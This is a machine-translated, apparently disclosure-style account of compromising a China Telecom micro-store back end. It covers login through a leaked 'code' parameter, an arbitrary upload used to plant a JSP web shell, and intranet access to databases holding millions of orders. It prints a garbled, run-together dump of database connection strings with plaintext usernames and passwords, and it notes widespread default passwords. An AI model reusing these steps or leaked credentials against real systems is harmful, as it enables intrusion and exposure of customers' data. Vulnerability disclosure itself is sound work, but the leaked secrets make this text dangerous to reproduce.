China Telecom micro-store Getshell (millions of users/millions of orders/Intranet/several database servers/fall into China Telecom micro-Stores)
First, a connection from Baidu
Http: // **. **/CTManager/login. do? Lel = 0 & code = nahalacfpagapogggjjcilcpobmp nib
Code = is equivalent to cookies. You can log on directly, and Baidu has caught this.
Enter the background
Click an advertisement. Any upload exists.
Get shell
Http: // **. **/CTManager/upload/images/20151123_181202788.jsp
Find many Database Connection Files
jdbc:sqlserver**.**.**.**:1433;databaseName=bgcj", "hlkj_lhb150", "HLEaI#$Sda2K3U8I");jdbc:oracle:thin:@**.**.**.**:1521:orcl", "hlkj_weixin", "weixin_hlkdrivers=oracle.jdbc.driver.OracleDriverlogfile=D\:\\user\\src\\java\\DBConnectionManager\\log.txt#idb.url=jdbc\:idb\:c\:\\local\\javawebserver1.1\\db\\db.prp#access.maxconn=300#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl#user=hlkj_lhb#password=liuhebinurl=jdbc:oracle:thin:@**.**.**.**:1521:orcluser=hlkj_wd_testpassword=test_wd_hlkj#url=jdbc:oracle:thin:@**.**.**.**:9937:orclurl=jdbc:oracle:thin:@**.**.**.**:1521:orclusername=hlkj_wd_testpassword=test_wd_hlkjdriverClassName=oracle.jdbc.driver.OracleDriverdrivers=oracle.jdbc.driver.OracleDriverlogfile=D\:\\user\\src\\java\\DBConnectionManager\\log.txt#idb.url=jdbc\:idb\:c\:\\local\\javawebserver1.1\\db\\db.prpaccess.maxconn=2#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl#user=hlkj_lhb#password=liuhebin#url=jdbc:oracle:thin:@**.**.**.**:1521:orclurl=jdbc:oracle:thin:@**.**.**.**:1521:orcl#user=hlkj_wsp#password=HL_wspjtwt1130user=hlkj_wd_testpassword=test_wd_hlkj#user=wd_test2#password=test_wd2#url=jdbc:oracle:thin:@**.**.**.**:1521:orcl#user=hlkj_rd#password=HL_ln148rd150213
Connect one
A lot of databases, and in the Intranet
View some information
Million orders
Clerk 50 W
The shell is missing. It is estimated that the shell has been deleted by the Administrator ,,,,,
According to the query system, most of the users are 888888 and 123456.
One account
Various packages